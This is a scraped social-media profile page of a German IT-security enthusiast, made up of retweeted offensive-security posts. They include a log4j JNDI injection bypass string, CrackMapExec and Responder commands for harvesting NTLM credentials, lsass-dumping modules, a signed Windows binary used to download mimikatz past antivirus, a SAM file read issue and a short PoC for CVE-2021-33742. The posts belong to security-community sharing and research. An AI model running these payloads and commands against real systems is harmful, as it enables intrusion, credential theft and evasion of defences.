brezel

641 posts

brezel banner
brezel

brezel

@br3zel

IT-Security, ArchLinux Enthusiast, More music..

Germany,K Katılım Haziran 2011
793 Takip Edilen195 Takipçiler
brezel retweetledi
Lukas Klein | @rantasec.bsky.social
Check out GoLinHound: - Discovers Linux & SSH attack paths - Outputs OpenGraph JSON for BloodHound ingestion - Integrates with SharpHound and AzureHound data to unveil cross-technology attack paths github.com/RantaSec/golin…
English
2
34
76
4.1K
brezel retweetledi
Velociraptor
Velociraptor@velocidex·
Watch the replay of VeloCON 2023 on our YouTube channel. You can relive the entire conference or watch any individual presentations you may have missed. youtube.com/watch?v=WWB5xe…
YouTube video
YouTube
English
0
9
20
2.3K
brezel retweetledi
stypr
stypr@brokenpacifist·
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} log4j bypass lol Lessons learned: Don't use Java.
English
29
451
1.9K
0
brezel retweetledi
diversenok
diversenok@diversenok_zero·
Did you know that it is possible to read memory using a PROCESS_CREATE_PROCESS handle? Just call NtCreateProcessEx to clone the target process (and its entire address space), and then read anything you want from there.😎
English
10
88
376
0
brezel retweetledi
mpgn
mpgn@mpgn_x64·
Lately, two new tools for dumping the lsass process have come up: HandleKatz and nanodump 👀 I've integrated them to CrackMapExec as module: 1⃣ -M handlekatz 2⃣ -M nanodump 3⃣ -M procdump (as bonus 😝) (dmp parsed by pypykatz from @SkelSec ) Available on @porchetta_ind 🪂
mpgn tweet mediampgn tweet mediampgn tweet media
English
4
263
721
0
brezel retweetledi
Elliot
Elliot@ElliotKillick·
Need to go under the radar downloading #mimikatz (and other suspect payloads)? Then newly discovered #lolbin "C:\Windows\System32\Cmdl32.exe" (signed by MS) is for you. It's like a new certutil.exe but absolutely unheard of by any antivirus software!
GIF
English
39
1K
2.9K
0
brezel retweetledi
mpgn
mpgn@mpgn_x64·
In case you want to see something cool about CrackMapExec and Responder 😌😋 1⃣ cme smb <ip> -u user -p pass --shares 2⃣ Responder -I eth0 3⃣ cme smb <ip> -u user -p pass -M slinky -o ... Harvest ntlmv2/v1 credentials in no time if you have write access to a share 🔥 🪂
mpgn tweet media
English
15
348
934
0
brezel retweetledi
Quarks
Quarks@quarkswdr·
Erst ein krasses Tabu – und irgendwann empört sich keiner mehr. Dafür gibt's einen einfachen Trick. Aus aktuellem Anlass.
Deutsch
56
314
828
0
brezel retweetledi
Maximus
Maximus@gladiatx0r·
I've published my first 'Gist' combining several well known techniques to accomplish Windows workstation takeover in a default Active Directory Configuration. SMB writeable shares are spicier than ever. 🌶️ gist.github.com/gladiatx0r/1ff…
English
8
184
504
0
brezel retweetledi
Jonas L
Jonas L@jonasLyk·
yarh- for some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file like this: I dont know the full extent of the issue yet, but its too many to not be a problem I think.
Jonas L tweet media
English
34
391
968
0
brezel retweetledi
Ivan Fratric 💙💛
Ivan Fratric 💙💛@ifsecure·
CVE-2021-33742 tweetable PoC: <script> var b = document.createElement("html"); b.innerHTML = Array(40370176).toString(); b.innerHTML = ""; </script>
Maddie Stone@maddiestone

We're also publishing root cause analyses for the four 0-days: Chrome CVE-2021-21166: googleprojectzero.github.io/0days-in-the-w… Chrome CVE-2021-30551: googleprojectzero.github.io/0days-in-the-w… Internet Explorer CVE-2021-33742: googleprojectzero.github.io/0days-in-the-w… Safari CVE-2021-1879: googleprojectzero.github.io/0days-in-the-w…

English
4
96
299
0